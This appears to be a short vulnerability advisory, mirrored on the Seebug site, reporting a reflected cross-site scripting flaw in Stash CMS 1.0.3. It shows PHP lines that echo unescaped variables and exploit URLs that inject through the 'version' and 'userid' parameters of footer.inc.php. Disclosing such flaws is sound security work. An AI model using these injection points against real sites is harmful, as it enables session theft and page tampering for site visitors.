###################### Author: ############################# Author: Mr.SeCreT E-mail: g-ff@hotmail.com<mailto:g-ff@hotmail.com> From: Syria http://english.islamweb.net/ ############## Script Information: ######################### Script: Stash 1.0.3 Remote XSS Vulnerability Language: PHP Download: http://garr.dl.sourceforge.net/project/nice-stash/Stash%20CMS/1.0.3/stash-1.0.3.zip ################### Vul Code: ############################## footer.inc.php: <?php echo $version; ?> <?php echo $userid ?>">My Info</a> <title><?php echo $pagetitle ?></title> header.inc.php: <?php echo $user ?> <?php echo $javascript ?> <?php echo $sitename ?> ################### Exploit: ############################### www.site.com/path/admin/footer.inc.php?version= www.site.com/path/admin/footer.inc.php?userid="> ############################################################
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论